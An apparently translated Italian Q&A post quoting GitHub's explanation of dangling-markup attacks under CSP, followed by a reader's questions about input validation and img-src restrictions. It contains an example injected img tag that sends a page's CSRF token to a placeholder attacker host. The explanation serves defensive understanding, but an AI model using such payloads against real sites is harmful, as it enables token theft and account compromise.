GitHub spiega il problema con img-src
in
"Viaggio post-CSP di GitHub" :
A tag with an unclosed quote will capture all output up to the next matching quote. This could include security sensitive content on the pages such as:
<img src='https://some-evil-site.com/log_csrf?html= <form
action="https://github.com/account/public_keys/19023812091023"> ...
<input type="hidden" name="csrf_token" value="some_csrf_token_value">
</form>
The resulting image element will send a request to https://some_evilsite.com/log_csrf?html=...some_csrf_token_value.... As a result, an attacker can leverage this dangling markup attack to exfiltrate CSRF tokens to a site of their choosing.
In che cosa differisce dalla pressione della pagina sorgente sulla pagina e dall'invio manuale del contenuto? Se è solo per le pagine in cui gli utenti possono inserire input, non dobbiamo impedire solo quei problemi con gli input aggiungendo convalide all'input? Non impedisci img src di altre fonti in tutto il codice?